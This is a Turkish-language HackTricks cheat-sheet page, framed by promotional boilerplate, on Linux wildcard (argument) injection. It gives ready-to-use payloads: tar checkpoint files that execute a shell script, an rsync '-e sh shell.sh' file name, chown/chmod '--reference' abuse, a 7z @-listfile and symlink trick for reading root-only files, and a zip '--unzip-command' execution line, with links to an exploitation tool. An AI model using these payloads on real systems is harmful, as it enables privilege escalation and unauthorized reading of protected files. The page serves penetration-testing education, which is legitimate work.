4.8 KiB
AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile öğrenin!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
chown, chmod
Diğer dosyalar için hangi dosya sahibi ve izinlerini kopyalamak istediğinizi belirtebilirsiniz
touch "--reference=/my/own/path/filename"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombine saldırı) kullanarak sömürülebilir.
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
Tar
Keyfi komutları çalıştır:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py kullanarak sömürülebilir (tar saldırısı)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
Rsync
Keyfi komutları çalıştır:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
Bu, https://github.com/localh0t/wildpwn/blob/master/wildpwn.py kullanarak sömürülebilir. _(_rsync attack)
Daha fazla bilgi için https://www.exploit-db.com/papers/33930
7z
7z'de, *
'den önce --
kullanarak (not: --
, takip eden girişin parametre olarak işleme alınamayacağı anlamına gelir, bu durumda sadece dosya yolları) bir dosyayı okumak için keyfi bir hata oluşturabilirsiniz. Bu durumda root tarafından aşağıdaki gibi bir komut çalıştırılıyorsa:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Ve bu yürütülen klasörde dosyalar oluşturabilirsiniz, @root.txt
dosyasını ve root.txt
dosyasını oluşturabilirsiniz, bu dosya istediğiniz dosyanın bir sembolik bağlantısı olabilir:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Ardından, 7z çalıştırıldığında, root.txt
'yi sıkıştırması gereken dosyaların listesini içeren bir dosya olarak işleyecektir (@root.txt
'nin varlığı bunu gösterir) ve 7z root.txt
'yi okuduğunda /file/you/want/to/read
'i okuyacak ve bu dosyanın içeriği bir dosya listesi olmadığı için bir hata fırlatacaktır ve içeriği gösterecektir.
Daha fazla bilgi için HackTheBox'tan CTF kutusu Write-up'larında.
Zip
Keyfi komutları çalıştırma:
zip name.zip files -T --unzip-command "sh -c whoami"
AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek isterseniz veya HackTricks'i PDF olarak indirmek isterseniz ABONELİK PLANLARINA göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- PEASS Ailesi'ni keşfedin, özel NFT'lerimizden oluşan koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'ı takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.